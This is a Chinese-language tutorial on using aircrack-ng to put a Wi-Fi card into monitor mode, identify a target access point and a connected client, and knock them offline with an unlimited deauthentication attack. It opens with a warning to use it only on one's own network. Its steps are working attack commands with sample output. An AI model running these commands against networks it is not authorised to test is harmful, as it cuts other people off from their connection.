警告：此方法只能用於自己的無線網路裝置，目的應該是了解無線網路運作，絕對不能造成他人的困擾或損失，我們應該秉持所有人類都是同胞的心態。就算你的鄰居或同學很令你厭煩，也千萬不能將這個用在他身上，你唯一能作的就是替他祈禱。

環境建議:
本機安裝的linux
(虛擬機或docker不一定有權限直接操作物理的wifi網路卡）
Ubuntu/Debian/Linux mint

1.下載無線網路工具aircrack

更新軟體庫

sudo apt update

安裝aircrack-ng軟體

sudo apt install aircrack-ng

2.檢查wifi網路卡名稱

找到自己的wifi網路卡名稱

iwconfig

以我的筆電來說無線網卡的開頭名稱常常是wl
就像這樣(為了安全這裡的數值都更改過，非原數值)

wlp3s0    IEEE 802.11  ESSID:"alex"  
          Mode:Managed  Frequency:2.462 GHz  Access Point: FF:FF:FF:FF:FF:FF   
          Bit Rate=72.2 Mb/s   Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=52/70  Signal level=-58 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:19   Missed beacon:0

我的網卡名稱是wlp3s0

3.監聽模式

把網卡切換成監聽模式

sudo airmon-ng start wlp3s0(這裡改成你的網卡名稱)

檢查網卡名稱是否變成監聽模式的名稱

iwconfig

來看看我的網卡名稱是否改變

wlp3s0mon  IEEE 802.11  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

我的網卡名稱變成wlp3s0mon了，成功進入監聽模式

4.開始蒐集所有wifi熱點資訊

顯示監聽結果

 sudo airodump-ng wlp3s0mon(你的網卡名稱)

我們這時可以看到周遭所有啟動的wifi熱點基地台

 CH  4 ][ Elapsed: 12 s ][ 2021-05-03 11:33 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
                                              
 EE:EE:EE:AA:AA:AA  -72       30        3    0  11  130   WPA2 CCMP   PSK  alice                                                        
 DD:DD:DD:DD:DD:DD  -60       34        0    0  6   65   WPA2 CCMP   PSK  bob 

這裡我們可以看到有兩個熱點，看到ESSID那欄，名稱分別是alice跟bob
我們的目標是alice
BSSDID是，這有點類似車牌，可是區分出無線網路中的不同裝置
alice的熱點的BSSID:

EE:EE:EE:AA:AA:AA

然後這時候看到CH那一欄 alice的CH(頻道)是:

11

5.監聽目標wifi熱點

這時候我們可以來看看有誰連上alice的wifi熱點

sudo airodump-ng --bssid EE:EE:EE:AA:AA:AA --channel 11  wlp3s0mon 

監聽到的結果

 CH 11 ][ Elapsed: 8 mins ][ 2021-05-03 11:54 ][ WPA handshake: EE:EE:EE:AA:AA:AA 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 EE:EE:EE:AA:AA:AA  -64 100     1152      332    0  11   65   WPA2 CCMP   PSK  alex                                                   

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 EE:EE:EE:AA:AA:AA  CC:CC:CC:CC:CC:CC  -67    1e- 0e     0      193  EAPOL  alex 

注意看底下STATION那個欄位有一個奇怪的MAC位址：

CC:CC:CC:CC:CC:CC

啊！原來有一個人連上了alice的wifi熱點，他的MAC位址是CC:CC:CC:CC:CC:CC
我們幫它取名為Peter吧～
Peter的電腦網卡MAC位置是CC:CC:CC:CC:CC:CC

6.中斷無線網路

我們現在用下面這條指令中斷Peter的連線

sudo aireplay-ng --deauth 0 -c CC:CC:CC:CC:CC:CC -a  EE:EE:EE:AA:AA:AA wlp3s0mon

加上註解

sudo aireplay-ng --deauth（中斷登入攻擊） 0（0代表無限次） -c CC:CC:CC:CC:CC:CC（被攻擊者peter的MAC位址） -a  EE:EE:EE:AA:AA:AA（alice的wifif熱點ID） wlp3s0mon(網卡名稱)

如果想要中斷所有使用者

sudo aireplay-ng --deauth 0  -a  EE:EE:EE:AA:AA:AA wlp3s0mon

7.復原自己的無線網路狀態

我們測試完畢了，把無線網卡從監聽狀態回復為一般狀態

sudo  airmon-ng stop  wlp3s0mon

不復原網卡你就無法正常上網

• secure
• aircrack
• 資安
• wifi